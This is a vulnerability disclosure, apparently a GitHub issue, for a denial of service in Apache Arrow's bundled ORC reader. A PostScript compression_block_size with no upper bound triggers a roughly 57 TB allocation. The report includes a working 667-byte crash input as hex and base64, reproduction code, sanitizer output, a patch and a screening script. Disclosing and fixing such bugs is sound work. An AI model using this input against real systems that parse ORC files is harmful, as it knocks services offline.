Uncontrolled multi-TB allocation in Apache Arrow C++ ORC reader via unbounded PostScript compression_block_size #2650

@OwenSanzas

Summary

A 667-byte crafted ORC file makes arrow::adapters::orc::ORCFileReader::Open
attempt a ~57 TB heap allocation while decoding the file footer, because the
bundled liborc reader trusts the attacker-supplied PostScript
compression_block_size with no upper bound. Any application that opens an
untrusted ORC file through Arrow's public ORC reader can be driven into an
out-of-memory abort / denial of service by a tiny input.

The defective code is in the bundled Apache ORC C++ library (liborc),
reachable through Arrow's public API. The fix belongs in apache/orc; this report
should be filed against apache/orc as well as apache/arrow (which bundles it).
Tested at apache/arrow pinned commit 16fe34250a2ef261790b9cc414fdf0831669cf9f
(25.0.0-SNAPSHOT; ARROW_DEPENDENCY_SOURCE=BUNDLED -> orc-format 1.1.1).

Root Cause

The ORC PostScript carries a compression_block_size (uint64). When liborc
decodes the footer it reads this field verbatim and feeds it straight into a
decompression-buffer allocation that happens before any compressed data is
read, so the entire attacker-declared block size is allocated up front:

  • getCompressionBlockSize() returns ps.compression_block_size() with no
    bound check, only a 256 KiB default when the field is absent
    (c++/src/Reader.cc:59).
  • readFooter() passes that value as the blockSize argument to
    createDecompressor() (c++/src/Reader.cc:1357).
  • For compression = ZLIB, createDecompressor() builds a
    ZlibDecompressionStream (c++/src/Compression.cc:1293); its base
    DecompressionStream constructor eagerly constructs
    outputDataBuffer(pool, bufferSize) (c++/src/Compression.cc:463).
  • DataBuffer<char>::reserve() then calls
    memoryPool_.malloc(sizeof(char) * newCapacity) (c++/src/MemoryPool.cc:106)
    with newCapacity equal to the declared block size, before a single byte
    of footer is decompressed.

Vulnerable code (c++/src/Reader.cc:59):

uint64_t getCompressionBlockSize(const proto::PostScript& ps) {
  if (ps.has_compression_block_size()) {
    return ps.compression_block_size();   // attacker-controlled, unbounded
  } else {
    return 256 * 1024;
  }
}

Eager allocation (c++/src/Compression.cc:463 -> c++/src/MemoryPool.cc:106):

// Compression.cc — DecompressionStream ctor allocates the full block up front
DecompressionStream::DecompressionStream(std::unique_ptr<SeekableInputStream> inStream,
                                         size_t bufferSize, MemoryPool& pool,
                                         ReaderMetrics* metrics)
    : pool(pool),
      input(std::move(inStream)),
      outputDataBuffer(pool, bufferSize),   // bufferSize == compression_block_size
      ...

// MemoryPool.cc — reserve() mallocs the whole capacity before any data is read
template <class T>
void DataBuffer<T>::reserve(uint64_t newCapacity) {
  if (newCapacity > currentCapacity_ || !buf_) {
    ...
    buf_ = reinterpret_cast<T*>(memoryPool_.malloc(sizeof(T) * newCapacity));
    currentCapacity_ = newCapacity;
  }
}

Call chain (attacker bytes -> fault):

arrow::adapters::orc::ORCFileReader::Open        adapter.cc:568  (public API)
  -> ORCFileReader::Impl::Open                    adapter.cc:218
    -> orc::createReader                          Reader.cc:1421
      -> orc::readFooter                          Reader.cc:1357   getCompressionBlockSize(ps)
        -> orc::createDecompressor                Compression.cc:1293
          -> orc::ZlibDecompressionStream::ctor   Compression.cc:694
            -> orc::DecompressionStream::ctor     Compression.cc:463
              -> orc::DataBuffer<char>::DataBuffer MemoryPool.cc:57
                -> orc::DataBuffer<char>::reserve  MemoryPool.cc:106  -> malloc(bufferSize)

liborc never validates the declared block size against the remaining
file / footer length before allocating.

PoC

A 667-byte crafted ORC file: a valid ORC magic plus a PostScript declaring
compression = ZLIB and an attacker-chosen compression_block_size
(0x33ffdbbd0000 ~ 57 TB after the buffer math).

# generate_poc.py — re-create the crash input from bytes
import binascii

POC_HEX = (
    "4f52431100000a061204080550003b00000a1b0a0300000012140805120e080310feffffff0f"
    "1882808080105000300000e392e2626660601012e66015e2e56012f8f71f0a180318002b0000"
    "e352e76262601052e4609592e6648080064108fda15e12c6086000004700000a210a05000000"
    "00001218080522120a00120bc3bc6ec3af63c3b664c3a9189c0150002700000a110a04000000"
    "00120908052a030a010350002800002b63616060600262662066036286ffffffff0300200000"
    "fbc7c2c4c400018c30bafe3f18fc0600360000636000811ff6608a81a141bef575e00e394e07"
    "08f7433d549c01000f00004e040102000b402800004b4c4a3abc27eff0fae4c3db520eafaca0"
    "100000050000ffa8a20000e362e360136090e0e602d18c120a609a49421a4c334bc883691609"
    "3530cd2a2106a41981eac4c1349384309866969003d24c40755c603e0b549e55825588858341"
    "800148322191c82240b614b3bb6f0800c40000e3aae462e1600d60e01ae16015e2e36016f8f7"
    "ffff7f7e89a686860601a0a83050949783092c0a068c4041450e5629694e0608681084d01fea"
    "25610ca012090e5625212e0621eec37bf20eaf4f3ebc2de5f04a893920cd9c1cac5acc5c8ccc"
    "010c00680100e3601678cc24c5cdc12cb09051224f212b835549858347889591899985558a39"
    "d3d8084898994831a70109c66229c62405060d060306250e0e66388b05ce6283b3d8e12c0608"
    "cb80d58a85833580c14a848355880f68e1bffffffff34b343534340800458581a2bc1c4c6051"
    "3060040a2a72b04a4973324040832084fe502f096300954870b02a09713008711fde9377787d"
    "f2e16d2987574acc0169e6e460d562e662640e607098e0e7c198c46aa467a067080008b70110"
    "01188080f4ddfdff0c2865300682f403034f524318"
)
data = binascii.unhexlify(POC_HEX)
assert len(data) == 667, len(data)
open("poc.bin", "wb").write(data)

Crash input size: 667 bytes (poc/poc.bin, md5 ec35f54cd76777e4f34f68f79c714a4e).
The PostScript declares compression_block_size such that the decompression
buffer math requests 0x33ffdbbd0000 (~57 TB).
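
The declared value can be cross-checked by hand from the PoC bytes. The sketch below is illustrative only and assumes the field numbering in ORC's orc_proto.proto (compressionBlockSize is PostScript field 3, so its tag byte is 0x18). It decodes the seven varint bytes that follow that tag near the end of POC_HEX and converts the result to decimal and binary units. Under that assumption the declared field itself already equals 0x33ffdbbd0000.

```python
# Varint bytes of PostScript field 3 (compression_block_size), copied from the
# tail of POC_HEX: ... 18 | 80 80 f4 dd fd ff 0c | 28 65 ...
raw = bytes.fromhex("8080f4ddfdff0c")

# Protobuf varints are little-endian base-128: 7 payload bits per byte,
# the high bit only marks "more bytes follow".
block_size = sum((b & 0x7F) << (7 * i) for i, b in enumerate(raw))

poc_len = 667  # size of poc.bin in bytes

print(hex(block_size))                    # 0x33ffdbbd0000
print(f"{block_size / 10**12:.2f} TB")    # 57.17 TB (decimal terabytes)
print(f"{block_size / 2**40:.2f} TiB")    # 52.00 TiB (binary tebibytes)
print(f"{block_size / poc_len:.2e}x the size of the input file")
```

The "~57 TB" figure in this report is therefore in decimal terabytes; the same request is roughly 52 TiB.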

Reproduction

Build Arrow C++ from source with -DARROW_ORC=ON and AddressSanitizer, then open the attached ORC file
through the public reader API:

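#include <arrow/adapters/orc/adapter.h>
#include <arrow/io/file.h>
// ReadableFile implements RandomAccessFile, so it can be passed to Open() directly.
auto in = arrow::io::ReadableFile::Open("poc.bin").ValueOrDie();
auto reader = arrow::adapters::orc::ORCFileReader::Open(in, arrow::default_memory_pool());  // huge alloc here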

liborc's getCompressionBlockSize() returns the attacker-controlled PostScript compression_block_size
with no upper bound, and that value reaches DataBuffer<char>::reserve() -> malloc. AddressSanitizer reports:

AddressSanitizer: requested allocation size 0x33ffdbbd0000 (~57 TB) exceeds maximum supported size
  DataBuffer<char>::reserve / readFooter (liborc Reader.cc)
  ORCFileReader::Open (cpp/src/arrow/adapters/orc/adapter.cc)

All of this is triggered by the 667-byte ORC file, which can be recreated with the generate_poc.py
script above or from the base64 below. The fix belongs in Apache ORC (liborc getCompressionBlockSize),
which is reached via the Arrow ORC reader.

Suggested Fix

The fix belongs in Apache ORC (liborc), since the unbounded allocation lives
there. Validate the declared compression_block_size against a sane upper bound
and/or against the remaining footer/file length before constructing the
decompression buffer, rejecting the file with a parse error otherwise. The check
belongs in getCompressionBlockSize() (Reader.cc:59) or at the
createDecompressor call site in readFooter() (Reader.cc:1357), so no caller
can hand an unbounded bufferSize to DecompressionStream:

 uint64_t getCompressionBlockSize(const proto::PostScript& ps) {
   if (ps.has_compression_block_size()) {
-    return ps.compression_block_size();
+    uint64_t blockSize = ps.compression_block_size();
+    // A compression block can never legitimately exceed the input; cap it so a
+    // malicious PostScript cannot force an unbounded up-front allocation.
+    if (blockSize > kMaxCompressionBlockSize) {
+      throw ParseError("Invalid compression block size in PostScript");
+    }
+    return blockSize;
   } else {
     return 256 * 1024;
   }
 }

(kMaxCompressionBlockSize is a placeholder constant that does not exist in
liborc today; the exact bound is upstream's judgement.) Apache Arrow should pick
up the fix when it bumps the bundled liborc; until then Arrow may also consider
bounding the allocation at the adapter layer.
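
Until a fixed liborc is available, an application that accepts untrusted ORC files could pre-screen them before handing them to the reader. The following is a minimal sketch of such a check, not part of Arrow or ORC. The helper names (read_varint, declared_block_size, check_orc_tail) and the MAX_BLOCK_SIZE cap are hypothetical. The cap of 2^23 is an assumption based on the ORC compressed-chunk header, which is 3 bytes and stores the chunk length in 23 bits; upstream may choose a different bound. The sketch also assumes the standard ORC tail layout (last byte is the PostScript length) and PostScript field 3 for compression_block_size.

```python
MAX_BLOCK_SIZE = 1 << 23  # hypothetical cap: chunk headers carry a 23-bit length


def read_varint(buf, pos):
    """Decode one protobuf base-128 varint; return (value, next_pos)."""
    value = shift = 0
    while True:
        if pos >= len(buf):
            raise ValueError("truncated varint in PostScript")
        byte = buf[pos]
        pos += 1
        value |= (byte & 0x7F) << shift
        if byte < 0x80:
            return value, pos
        shift += 7


def declared_block_size(data):
    """Return the PostScript compression_block_size (field 3), or None if absent."""
    if not data or len(data) < data[-1] + 1:
        raise ValueError("input too short to contain a PostScript")
    ps_len = data[-1]                    # last byte of the file = PostScript length
    ps = data[-1 - ps_len:-1]
    pos = 0
    while pos < len(ps):
        key, pos = read_varint(ps, pos)
        number, wire_type = key >> 3, key & 7
        if wire_type == 0:               # varint field
            value, pos = read_varint(ps, pos)
            if number == 3:
                return value
        elif wire_type == 2:             # length-delimited field: skip the payload
            length, pos = read_varint(ps, pos)
            pos += length
        else:
            raise ValueError(f"unexpected wire type {wire_type} in PostScript")
    return None


def check_orc_tail(data, limit=MAX_BLOCK_SIZE):
    """Raise ValueError if the declared block size exceeds `limit`; else return it."""
    size = declared_block_size(data)
    if size is not None and size > limit:
        raise ValueError(f"compression_block_size {size} exceeds limit {limit}")
    return size
```

Because the PostScript is at most 255 bytes, passing the last 256 bytes of a file is enough, for example check_orc_tail(open("poc.bin", "rb").read()[-256:]). This only screens the PostScript field discussed here; it is not a general ORC validator and does not replace the liborc fix.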

PoC bytes (self-contained)

The trigger input is 667 bytes (poc/poc.bin).
Recreate it exactly with:

base64 -d > poc.bin <<'B64'
T1JDEQAACgYSBAgFUAA7AAAKGwoDAAAAEhQIBRIOCAMQ/v///w8YgoCAgBBQADAAAOOS4mJmYGAQEuZgFeLlYBL49x8KGAMYACsA
AONS52JiYBBS5GCVkuZkgIAGQQj9oV4SxghgAABHAAAKIQoFAAAAAAASGAgFIhIKABILw7xuw69jw7Zkw6kYnAFQACcAAAoRCgQA
AAAAEgkIBSoDCgEDUAAoAAArY2FgYGACYmYgZgNihv////8DACAAAPvHwsTEAAGMMLr+Pxj8BgA2AABjYACBH/ZgioGhQb71deAO
OU4HCPdDPVScAQAPAABOBAECAAtAKAAAS0xKOrwn7/D65MPbUg6vrKAQAAAFAAD/qKIAAONi42ATYJDg5gLRjBIKYJpJQhpMM0vI
g2kWCTUwzSohBqQZgerEwTSThDCYZpaQA9JMQHVcYD4LVJ5VglWIhYNBgAFIMiGRyCJAthSzu28IAMQAAOOq5GLhYA1g4BrhYBXi
42AW+Pf//39+iaaGhgYBoKgwUJSXgwksCgaMQEFFDlYpaU4GCGgQhNAf6iVhDKASCQ5WJSEuBiHuw3vyDq9PPrwt5fBKiTkgzZwc
rFrMXIzMAQwAaAEA42AWeMwkxc3BLLCQUSJPISuDVUmFg0eIlZGJmYVVijnT2AhImJlIMacBCcZiKcYkBQYNBgMGJQ4OZjiLBc5i
g7PY4SwGCMuA1YqFgzWAwUqEg1WID2jhv/////NLNDU0NAgARYWBorwcTGBRMGAECipysEpJczJAQIMghP5QLwljAJVIcLAqCXEw
CHEf3pN3eH3y4W0ph1dKzAFp5uRg1WLmYmQOYHCY4OfBmMRqpGegZwgACLcBEAEYgID03f3/DChlMAaC9AMDT1JDGA==
B64

Credit

Aisle Research (Ze Sheng (O2Lab & TAMU), Dmitrijs Trizna, Luigino Camastra, Guido Vranken).
